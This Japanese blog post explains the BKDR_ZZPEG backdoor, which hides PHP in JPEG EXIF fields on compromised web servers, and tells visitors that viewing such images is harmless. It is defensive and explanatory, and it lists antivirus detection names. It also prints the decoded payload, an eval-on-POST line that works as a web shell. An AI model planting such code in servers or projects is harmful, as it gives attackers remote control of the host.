JPEG画像にウイルス? バックドアBKDR_ZZPEG.SM Backdoor.PHP.Agent.vd
 
JPEG形式の画像ファイル(拡張子 .jpg)から脅威を検出します!
 
画像の大きさ、撮影位置、カメラの情報といったデータが含まれてる Exif情報 の領域に不正なスクリプト処理が記述されてるそうで。
 
JPGファイルを隠ぺいに利用するWebサーバ専用バックドア「BKDR_ZZPEG」の被害を日本で確認 (トレンドマイクロ)
http://blog.trendmicro.co.jp/archives/7760
 
Malware Hidden Inside JPG EXIF Headers - Sucuri Blog
https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html
  
Yahoo!知恵袋の投稿から、悪意のある第三者に侵害されてた可能性が高い コミック販売サイト のお話です。
 
昨日、ネットで上がっているWEBコミックのD.C.靴蔵入り事件簿を見ようと思いマッグガーデンのD.C.靴離據璽(comic.mag-garden[.]co.jp/blade/2741.html)につないだら
いきなり自分が使っているウィルスバスター月額版が作動して「疑わしいファイルを削除しました」と出てログを見てみたところウィルス名がBKDR_ZZPEG.SMという名前でした
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q14112052679
 
とある日本の製造販売業のホームページにて、同系統のJPEG画像ファイルを見つけたのでスクリーンショット画像を公開します。
 
http://i43.tinypic.com/2ufx99x.png
JPEG画像ファイルのExif情報の領域に不正な記述が!
 
ファイルのプロパティを見ると、カメラの製造元カメラのモデル の値に不正な記述が確認できました。
 
/.*/e
 
eval(base64_decode(' ~英数字の羅列~ '));
 
eval(base64_decodeの処理すると下のようになります。
 
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

不正なJPEG画像ファイルを検出! 影響は?

この話題を見ると、画像ウイルス のお話と勘違いするユーザーさんいそうだけど、訪問ユーザーさんはこの画像ファイルから直接損害は受けることはないです。
  • この画像ファイルをブラウザが読み込んで表示された
  • この画像ファイルを画像ビューアーやペイントソフトで開いた
    → 何も危険性はない
Windwos XP/Vista/7/8、Mac OS X、Androidスマホ、iOS(iPhone/iPad)、ガラケー、ゲーム機 など何も影響はなく 『画像ファイルを開いただけでウイルス感染!』という状況になるものではない です。
 
このJPEG画像ファイルは、企業や個人が運営する一般サイト上で検出されるはずで、対処しないといけないのはサイトの運営者・管理者だけ。 <第三者がサーバーに不正アクセスしハッキングされてる可能性が高い!

バックドア!? ウイルス検出名

「バックドア」なるウイルス検出名にビックリ仰天しそうだけど、あくまでバックドアの部品にすぎず、セキュリティソフトが検出しても慌てる必要はありません。
 
BitDefender Trojan.PHP.Agent.GA
Kaspersky Backdoor.PHP.Agent.vd Trojan.PHP.Jpger.a
McAfee Generic BackDoor.agb
Sophos Troj/PHPDoor-J  Troj/PHP-N
Symantec Trojan Horse
Trend Micro BKDR_ZZPEG.SM (BKDR ZZPEG)